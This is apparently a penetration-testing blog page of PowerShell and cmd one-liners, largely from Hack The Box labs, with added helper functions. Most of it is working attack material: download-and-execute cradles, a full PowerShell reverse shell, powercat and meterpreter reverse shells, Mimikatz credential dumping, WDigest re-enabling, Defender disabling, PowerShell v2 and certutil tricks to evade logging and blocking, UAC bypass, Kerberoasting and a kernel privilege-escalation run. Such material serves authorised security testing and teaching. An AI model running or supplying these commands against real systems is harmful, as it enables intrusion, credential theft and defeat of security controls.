puckiestyle – ethical hacking
whoami : Network / System Engineer , Security specialist from Meppel (NL)
powershell oneliners
PowerShell (any version):
(New-Object System.Net.WebClient).DownloadFile("http://10.10.14.19/shell-443.exe", "C:\FTP\Intranet\shell-443.exe")
PS C:\users\hillie> (New-Object System.Net.WebClient).DownloadFile("http://192.168.178.16:8000/MS14-058.exe", "c:\users\public\MS14-058.exe")
C:\> PowerShell (New-Object System.Net.WebClient).DownloadFile('http://192.168.178.16:8000/launcher.bat','launcher.bat'); Start-Process 'launcher.bat'
powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('192.168.178.16',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
PS C:\Users\hillie> IEX (New-Object Net.WebClient).DownloadString('http://192.168.178.16/puckieshell443.ps1')
C:\Users\hillie>cmdkey /list

Currently stored credentials:

    Target: Domain:interactive=HTB\Administrator
    Type: Domain Password
    User: HTB\Administrator
c:\Python37>python -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.10.98 - - [28/Feb/2019 19:38:58] "GET /puckieshell443.ps1 HTTP/1.1" 200 -
c:\Users\Public>certutil -urlcache -split -f http://10.10.14.20/puckieshell443.ps1
If -urlcache is blocked or monitored, -VerifyCTL still fetches the URL: certutil fails to parse the body as a certificate trust list, but -split has already written the download to the current directory as <sha1>.bin, which you just rename:
PS C:\pentest> certutil.exe -f -split -VerifyCTL http://192.168.178.12/msbuild_nps.xml
CertUtil: -verifyCTL command FAILED: 0x8009310b (ASN: 267 CRYPT_E_ASN1_BADTAG)
CertUtil: ASN1 bad tag value met.
PS C:\pentest> dir *.bin

    Directory: C:\pentest

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----         5/7/2019   4:16 PM           5462 619bd719eb0f011e589ef17f4fd8693d9ba8d481.bin

PS C:\pentest> mv 619bd719eb0f011e589ef17f4fd8693d9ba8d481.bin msbuild_nps.xml
PS C:\pentest> dir *.xml

    Directory: C:\pentest

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----         5/7/2019   4:16 PM           5462 msbuild_nps.xml
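The same -VerifyCTL download wrapped in a function, as an added example that is not from the original post: it runs certutil, picks up the single new .bin that appeared in the current directory, checks that the blob name is the SHA-1 of its content (an assumption drawn from the 40-hex-character name seen above; a mismatch only warns), and renames it. It assumes the URL is served by your own box.

```powershell
# Added example (not the post's own code): certutil -VerifyCTL as a file download.
# certutil exits with CRYPT_E_ASN1_BADTAG because the body is not a CTL; that is expected.
# Assumption: the dropped .bin is named after the SHA-1 of the content, so we can sanity-check it.
function Get-FileViaCertutilCtl {
    param(
        [Parameter(Mandatory)][string]$Url,
        [Parameter(Mandatory)][string]$OutFile
    )
    # Snapshot existing .bin files so we only pick up the one certutil creates
    $before = @(Get-ChildItem -Path . -Filter *.bin -File | Select-Object -ExpandProperty Name)

    # The ASN1 error goes to the console normally; swallow it, only the side effect matters
    & certutil.exe -f -split -VerifyCTL $Url 2>&1 | Out-Null

    $new = @(Get-ChildItem -Path . -Filter *.bin -File | Where-Object { $before -notcontains $_.Name })
    if ($new.Count -ne 1) {
        throw "expected exactly one new .bin in $(Get-Location), found $($new.Count) (download blocked?)"
    }
    $blob = $new[0]

    # Get-FileHash returns uppercase hex; -ne is case-insensitive so that is fine
    $sha1 = (Get-FileHash -Path $blob.FullName -Algorithm SHA1).Hash
    if ($sha1 -ne $blob.BaseName) {
        Write-Warning "blob name $($blob.BaseName) is not its SHA-1 ($sha1); inspect the content before using it"
    }

    Move-Item -Path $blob.FullName -Destination $OutFile -Force
    Get-Item -Path $OutFile
}

# Same URL and target name as the manual run above
Get-FileViaCertutilCtl -Url 'http://192.168.178.12/msbuild_nps.xml' -OutFile 'msbuild_nps.xml'
```

Run it from the directory you want the file in; certutil writes the .bin to the current working directory, not to %TEMP%.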
C:\Users\Public> runas /user:HTB\administrator /savecred "powershell IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.20/puckieshell443.ps1')"
C:\Users\jacco>nc -lvp 443
listening on [any] 443 ...
10.10.10.xx: inverse host lookup failed: h_errno 11004: NO_DATA
connect to [10.10.14.20] from (UNKNOWN) [10.10.10.98] 49167: NO_DATA
Windows PowerShell running as user Administrator on HTB
Copyright (C) 2015 Microsoft Corporation. All rights reserved.

PS C:\Windows\system32>whoami
HTB\administrator
root@kali:~/htb/access# echo -n "IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.20/puckieshell53.ps1')" | iconv --to-code UTF-16LE | base64 -w 0
SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQAwAC4AMQAwAC4AMQA0AC4AMgAwAC8AcAB1AGMAawBpAGUAcwBoAGUAbABsADUAMwAuAHAAcwAxACcAKQA=
c:\Users\Public> runas /user:ACCESS\administrator /savecred "powershell -EncodedCommand SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQAwAC4AMQAwAC4AMQA0AC4AMgAwAC8AcAB1AGMAawBpAGUAcwBoAGUAbABsADUAMwAuAHAAcwAxACcAKQA="
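The same -EncodedCommand payload built on the Windows side rather than with iconv/base64 on Kali, as an added example (not code from the original post). It encodes the cradle used above, proves it decodes back to the exact command before it goes into runas, and warns when the resulting line would exceed what cmd.exe accepts. The URL is the one from the post; the runas target and the 8191-character cmd.exe limit are the assumptions.

```powershell
# Added example (not the post's own code): build and verify an -EncodedCommand argument.
function ConvertTo-EncodedCommand {
    param([Parameter(Mandatory)][string]$Command)
    # -EncodedCommand expects base64 of the UTF-16LE bytes ([Text.Encoding]::Unicode).
    # Encoding as UTF-8/ASCII (e.g. plain `base64` without iconv) yields garbage PowerShell refuses to run.
    [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($Command))
}

function ConvertFrom-EncodedCommand {
    param([Parameter(Mandatory)][string]$Encoded)
    [Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($Encoded))
}

$cmd = "IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.20/puckieshell53.ps1')"
$enc = ConvertTo-EncodedCommand -Command $cmd

# Round-trip check (case-sensitive): what runas hands to powershell.exe must decode to the exact command
if ((ConvertFrom-EncodedCommand -Encoded $enc) -cne $cmd) {
    throw 'encoded command does not round-trip'
}

# Base64 of UTF-16LE is roughly 2.7x the original length and cmd.exe stops at 8191 characters,
# so anything bigger than a short cradle is better hosted and downloaded, as the post does.
$line = "runas /user:ACCESS\administrator /savecred `"powershell -EncodedCommand $enc`""
if ($line.Length -gt 8191) {
    Write-Warning "command line is $($line.Length) characters, too long for cmd.exe"
}
$line
```

Paste the printed line into the cmd.exe shell you got as the low-privileged user; the saved credential from cmdkey /list does the rest.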
powershell.exe -version 2 IEX (New-Object System.Net.Webclient).DownloadString('http://192.168.178.13/powercat.ps1');powercat -c 192.168.178.13 -p 1234 -e cmd
-version 2 starts the PowerShell 2.0 engine, which has no AMSI, no script block logging and no constrained language mode; it only works when .NET Framework 3.5 is installed on the box.
PowerShell 4.0 & 5.0:
PS C:\Users\hillie> Invoke-WebRequest "http://192.168.178.50/shell-443.exe" -OutFile "C:\FTP\intranet\shell-443.exe"
xp_cmdshell "PowerShell IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.20/puckieshell443.ps1')"
xp_cmdshell "PowerShell IEX(IWR('http://10.10.14.20/puckieshell443.ps1'))"
Switch user with a local PSRemoting session when you have a password but runas is awkward (here from a web shell under IIS):
c:\inetpub\wwwroot\internal-01\log>powershell
Windows PowerShell
Copyright (C) 2016 Microsoft Corporation. All rights reserved.

Cannot load PSReadline module. Console is running without PSReadline.
PS C:\inetpub\wwwroot\internal-01\log> $username = 'BART\h.potter'
PS C:\inetpub\wwwroot\internal-01\log> $securePassword = ConvertTo-SecureString -AsPlainText -Force 'Password1'
PS C:\inetpub\wwwroot\internal-01\log> $credential = New-Object System.Management.Automation.PSCredential $username, $securePassword
PS C:\inetpub\wwwroot\internal-01\log> Enter-PSSession -ComputerName localhost -Credential $credential
[localhost]: PS C:\Users\h.potter\Documents> whoami
bart\h.potter
[localhost]: PS C:\Users\h.potter\Documents> [System.Environment]::Is64BitOperatingSystem
True
[localhost]: PS C:\Users\h.potter\Documents> [System.Environment]::Is64BitProcess
True
PS C:\users> IEX (New-Object Net.WebClient).DownloadString('http://192.168.178.16:8000/Sherlock.ps1')

Title      : Win32k Elevation of Privilege
MSBulletin : MS16-135
CVEID      : 2016-7255
Link       : https://github.com/FuzzySecurity/PSKernel-Primitives/tree/master/Sample-Exploits/MS16-135
VulnStatus : Appears Vulnerable
PS C:\Users\hillie> powershell "IEX (New-Object Net.WebClient).DownloadString('http://www.puckiestyle.nl/ps/powerup.ps1');Invoke-AllChecks"
PS C:\Users\hillie> (new-object net.webclient).downloadfile('http://10.10.14.20/powerup.ps1', 'C:\users\mssql-svc\appdata\local\temp\powerup.ps1')
PS C:\users\mssql-svc\appdata\local\temp> import-module ./powerup.ps1
[*] Running Invoke-AllChecks
PS C:\Users\hillie> powershell "IEX (New-Object Net.WebClient).DownloadString('http://www.puckiestyle.nl/ps/invoke-mimikatz.ps1');Invoke-Mimikatz"
PS C:\Users\hillie> Powershell "IEX (New-Object Net.WebClient).DownloadString('http://www.puckiestyle.nl/ps/powerview.ps1');Get-IPAddress"
PS C:\Users\hillie> Powershell "IEX (New-Object Net.WebClient).DownloadString('http://www.puckiestyle.nl/ps/windowsenum.ps1')"
PS C:\Users\hillie> Powershell "IEX (New-Object Net.WebClient).DownloadString('http://www.puckiestyle.nl/ps/jaws.ps1')"
Powershell.exe -NoP -NonI -W Hidden -Exec Bypass IEX (New-Object Net.WebClient).DownloadString('http://192.168.178.50/Invoke-Shellcode.ps1'); Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost 192.168.78.50 -Lport 4444
d:\PENTEST\impacket-examples-windows-master>psexec puckiestyle.local/administrator@192.168.178.200
PS D:\PENTEST\impacket-examples-windows-master> Connect-PSSession -ComputerName 192.168.178.200 -Credential administrator
C:\WINDOWS\system32>psexec.exe \\192.168.178.200 -u puckiestyle\puck -p p@ssw0rd cmd.exe
wmic /NODE:"DC01" /USER:"puckiestyle\administrator" OS GET Name
wmic /node:192.168.23.214 NIC get description,macaddress
wmic /USER:"puckiestyle\puck" /PASSWORD:"p@ssw0rd" /NODE:192.168.178.200 process call create "powershell.exe -exec bypass IEX (New-Object Net.WebClient).DownloadString('http://192.168.178.50/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds | Out-File C:\\Users\\public\\a.txt"
Re-enable WDigest plaintext credential caching (off by default since Windows 8.1/2012 R2 and on older systems with KB2871997), then lock the workstation so the user logs in again and LSASS caches the password for Mimikatz:
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f
rundll32.exe user32.dll,LockWorkStation
root@kali# msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.20 LPORT=443 -f exe -o mrshell-p443.exe
root@kali# msfconsole -x "use multi/handler;set payload windows/x64/meterpreter/reverse_tcp; set lhost 10.10.14.20; set lport 443; set ExitOnSession false; exploit -j"
PS C:\WINDOWS\system32> Set-MpPreference -DisableRealtimeMonitoring $true
PS C:\WINDOWS\system32> Set-MpPreference -DisableIOAVProtection $true
Change Claire's password to Password1!:
Set-ADAccountPassword -Reset -NewPassword (ConvertTo-SecureString -String 'Password1!' -AsPlainText -Force) -Identity Claire
Log in as Claire and add Tom to Backup_Admins:
Add-ADGroupMember -Identity Backup_Admins -Members tom
Want to add a brand new executable extension (also callable from a .bat)?
C:\Users\jacco>set PATHEXT=%PATHEXT%;.puck
C:\Users\jacco>set pathext
PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.puck
set only changes the current cmd session (use setx or the registry for persistence), and PATHEXT only makes "foo" resolve to foo.puck; cmd still needs an assoc/ftype mapping for .puck before it can launch the file.
Want to know Applocker status from a cmd shell?
powershell -nop -c "import-module applocker; get-command *applocker*"
powershell -nop -c "import-module applocker; Get-AppLockerPolicy -Effective -Xml"
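Reading the raw XML from Get-AppLockerPolicy -Effective gets old quickly; the added example below (not code from the original post) summarises the effective policy per rule collection and then asks AppLocker itself, via Test-AppLockerPolicy, whether a probe binary dropped in a few candidate directories would be allowed to run. Assumptions: the AppLocker module is available, 'Everyone' is an acceptable principal to test as, the candidate directories are the usual writable suspects under %WINDIR%, and cmd.exe is used as the probe file (Test-AppLockerPolicy needs a real file on disk).

```powershell
# Added example (not the post's own code): AppLocker enforcement summary plus path probing.
Import-Module AppLocker

function Get-AppLockerSummary {
    $policy = Get-AppLockerPolicy -Effective
    foreach ($rc in $policy.RuleCollections) {
        [pscustomobject]@{
            Collection  = $rc.RuleCollectionType      # Exe, Dll, Script, Msi, Appx
            Enforcement = $rc.EnforcementMode         # NotConfigured, AuditOnly, Enabled
            RuleCount   = ($rc | Measure-Object).Count
        }
    }
}

function Test-AppLockerProbe {
    param(
        # Assumed candidates: directories a normal user can often write to under %WINDIR%
        [string[]]$Directory = @("$env:WINDIR\Tasks", "$env:WINDIR\Temp", "$env:TEMP"),
        [string]$User = 'Everyone',
        # cmd.exe is Microsoft-signed, so a publisher rule may allow it anywhere; point this at
        # your own unsigned binary to see what your real payload would get.
        [string]$ProbeSource = "$env:WINDIR\System32\cmd.exe"
    )
    $policy = Get-AppLockerPolicy -Effective
    foreach ($dir in $Directory) {
        $probe = Join-Path -Path $dir -ChildPath 'probe.exe'
        try {
            Copy-Item -Path $ProbeSource -Destination $probe -ErrorAction Stop
        } catch {
            # Not writable: AppLocker never gets asked, report that instead of a decision
            [pscustomobject]@{ FilePath = $probe; PolicyDecision = 'NotWritable'; MatchingRule = $null }
            continue
        }
        try {
            # PolicyDecision is Allowed/Denied, or AllowedByDefault/DeniedByDefault when no rule matched
            Test-AppLockerPolicy -PolicyObject $policy -Path $probe -User $User |
                Select-Object FilePath, PolicyDecision, MatchingRule
        } finally {
            Remove-Item -Path $probe -ErrorAction SilentlyContinue
        }
    }
}

Get-AppLockerSummary | Format-Table -AutoSize
Test-AppLockerProbe | Format-Table -AutoSize
```

An Enforcement of NotConfigured for the Exe collection means nothing is enforced even when rules exist; AuditOnly only logs to the AppLocker event log, so a Denied decision there does not actually block you.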
Set TrustedHosts with PowerShell (as Admin)
Set-Item -Path WSMan:\localhost\Client\TrustedHosts -Value "Computer1,Computer2"
-Value replaces the whole list; add -Concatenate to append to it. TrustedHosts is only consulted for NTLM connections (IP addresses, workgroup hosts); domain-joined targets reached by name use Kerberos and need no entry.
And check (you don't need Admin for that)
Get-Item WSMan:\localhost\Client\TrustedHosts
c:\users\public>powershell IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.20/puckieshell53.ps1')
root@kali:~/htb/optimum# python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.10.8 - - [09/Apr/2019 10:06:51] "GET /puckieshell53.ps1 HTTP/1.1" 200 -
root@kali:~/htb/optimum# nc -lvp 53
Ncat: Version 7.70 ( https://nmap.org/ncat )
Ncat: Listening on :::53
Ncat: Listening on 0.0.0.0:53
Ncat: Connection from 10.10.10.8.
Ncat: Connection from 10.10.10.8:49541.
Windows PowerShell running as user kostas on OPTIMUM
Copyright (C) 2015 Microsoft Corporation. All rights reserved.

PS C:\Users\kostas\Desktop> [System.Environment]::Is64BitOperatingSystem
True
PS C:\Users\kostas\Desktop> [System.Environment]::Is64BitProcess
True
PS C:\users> (New-Object System.Net.WebClient).DownloadFile("http://192.168.178.16:8000/Invoke-MS16135.ps1", "c:\users\public\Invoke-MS16135.ps1")
PS C:\users\public> import-module ./Invoke-MS16135.ps1
PS C:\users\public> Invoke-MS16135 -Command "IEX(New-Object Net.WebClient).DownloadString('http://192.168.178.16/puckieshell53.ps1')"
[MS16-135 ASCII banner] [by b33f -> @FuzzySec]
[!] Success, spawning a system shell!
root@kali:~/htb# nc -lvp 53
listening on [any] 53 ...
192.168.178.11: inverse host lookup failed: Unknown host
connect to [192.168.178.16] from (UNKNOWN) [192.168.178.11] 49238
Windows PowerShell running as user hillie on HILLIE
Copyright (C) 2015 Microsoft Corporation. All rights reserved.

PS C:\users\public>whoami
nt authority\system
PS C:\users\public>
If you ever need to enable RDP (mstsc) on a Windows 10 machine, and you can’t get to the System control panel item, use Powershell to enable RDP:
# Enable Remote Desktop
(Get-WmiObject Win32_TerminalServiceSetting -Namespace root\cimv2\TerminalServices).SetAllowTsConnections(1,1) | Out-Null
(Get-WmiObject -Class "Win32_TSGeneralSetting" -Namespace root\cimv2\TerminalServices -Filter "TerminalName='RDP-tcp'").SetUserAuthenticationRequired(0) | Out-Null
Get-NetFirewallRule -DisplayName "Remote Desktop*" | Set-NetFirewallRule -Enabled True
Run the above as Administrator in PowerShell and RDP should work. Note that SetUserAuthenticationRequired(0) switches Network Level Authentication off; leave that line out if you only need to allow connections.
To test the connection, open Powershell on another machine, and run:
PS C:\Users\jacco> Test-NetConnection 10.10.10.97 -CommonTCPPort rdp

ComputerName     : 10.10.10.97
RemoteAddress    : 10.10.10.97
RemotePort       : 3389
InterfaceAlias   : Ethernet 2
SourceAddress    : 10.10.14.12
TcpTestSucceeded : True
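As an added example (not code from the original post), the same enable-RDP procedure done through the registry values and firewall rule group that the WMI calls above set underneath, with a read-back so you can tell on the box itself whether RDP is enabled, whether NLA is still required, which port it uses and whether something is listening, before you run Test-NetConnection from the other side. Assumptions: an English Windows (the firewall rule group is named 'Remote Desktop'; it is localised on other languages) and an elevated PowerShell for Enable-Rdp.

```powershell
# Added example (not the post's own code): check and enable RDP via registry + firewall.
$TsKey  = 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server'
$RdpKey = "$TsKey\WinStations\RDP-Tcp"

function Get-RdpState {
    $ts   = Get-ItemProperty -Path $TsKey
    $rdp  = Get-ItemProperty -Path $RdpKey
    $port = [int]$rdp.PortNumber
    [pscustomobject]@{
        Enabled     = ($ts.fDenyTSConnections -eq 0)       # 1 = connections denied (the default)
        NlaRequired = ($rdp.UserAuthentication -eq 1)      # 0 is what SetUserAuthenticationRequired(0) sets
        Port        = $port
        FirewallOn  = @(Get-NetFirewallRule -DisplayGroup 'Remote Desktop' -Enabled True -ErrorAction SilentlyContinue).Count -gt 0
        Listening   = @(Get-NetTCPConnection -State Listen -LocalPort $port -ErrorAction SilentlyContinue).Count -gt 0
    }
}

function Enable-Rdp {
    # Default mirrors the post (NLA off); pass -KeepNla to leave authentication required
    param([switch]$KeepNla)
    Set-ItemProperty -Path $TsKey -Name fDenyTSConnections -Value 0 -Type DWord
    if (-not $KeepNla) {
        Set-ItemProperty -Path $RdpKey -Name UserAuthentication -Value 0 -Type DWord
    }
    Enable-NetFirewallRule -DisplayGroup 'Remote Desktop'
    # TermService picks the registry change up without a restart; read back to confirm
    Get-RdpState
}

# Look first: if Enabled and FirewallOn are already True, only the network path is in the way
Get-RdpState
```

Call Enable-Rdp when the read-back shows Enabled or FirewallOn as False; if Listening stays False afterwards, check that the TermService service is running (Get-Service TermService).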
Move a small file over a text-only channel: base64 it on one side, paste and decode on the other.
PS C:\Users\jacco> [Convert]::ToBase64String([IO.File]::ReadAllBytes("C:\PENTEST\secret.txt"))
ZGl0IGJlc3RhbmQgaXMgZ2VoZWltDQpncm9ldGplcyBQdWNr
PS C:\pentest> [IO.File]::WriteAllBytes("c:\pentest\new.txt", [Convert]::FromBase64String("ZGl0IGJlc3RhbmQgaXMgZ2VoZWltDQpncm9ldGplcyBQdWNr"))
PS C:\pentest> type new.txt
dit bestand is geheim
groetjes Puck
# Description:
# Collection of PowerShell one-liners for red teamers and penetration testers to use at various stages of testing.

# Invoke-BypassUAC and start PowerShell prompt as Administrator [Or replace to run any other command]
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/privesc/Invoke-BypassUAC.ps1');Invoke-BypassUAC -Command 'start powershell.exe'"

# Invoke-Mimikatz: Dump credentials from memory
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1');Invoke-Mimikatz -DumpCreds"

# Import Mimikatz Module to run further commands
powershell.exe -exec Bypass -noexit -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1')"

# Invoke-MassMimikatz: Use to dump creds on remote host [replace $env:computername with target server name(s)]
powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PewPewPew/Invoke-MassMimikatz.ps1');'$env:COMPUTERNAME'|Invoke-MassMimikatz -Verbose"

# PowerUp: Privilege escalation checks
powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerUp/PowerUp.ps1');Invoke-AllChecks"

# Invoke-Inveigh and log output to file
powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/Kevin-Robertson/Inveigh/master/Scripts/Inveigh.ps1');Invoke-Inveigh -ConsoleOutput Y -NBNS Y -mDNS Y -Proxy Y -LogOutput Y -FileOutput Y"

# Invoke-Kerberoast and provide Hashcat compatible hashes
powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1');Invoke-Kerberoast -OutputFormat Hashcat"

# Invoke-ShareFinder and print output to file
powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerView/powerview.ps1');Invoke-ShareFinder -CheckShareAccess|Out-File -FilePath sharefinder.txt"

# Import PowerView Module to run further commands
powershell.exe -exec Bypass -noexit -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerView/powerview.ps1')"

# Invoke-Bloodhound
powershell.exe -exec Bypass -C "IEX(New-Object Net.Webclient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/master/Ingestors/SharpHound.ps1');Invoke-BloodHound"

# Find GPP Passwords in SYSVOL
findstr /S cpassword $env:logonserver\sysvol\*.xml
findstr /S cpassword %logonserver%\sysvol\*.xml (cmd.exe)

# Run Powershell prompt as a different user, without loading profile to the machine [replace DOMAIN and USER]
runas /user:DOMAIN\USER /noprofile powershell.exe

# Insert reg key to enable Wdigest on newer versions of Windows
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\Wdigest /v UseLogonCredential /t Reg_DWORD /d 1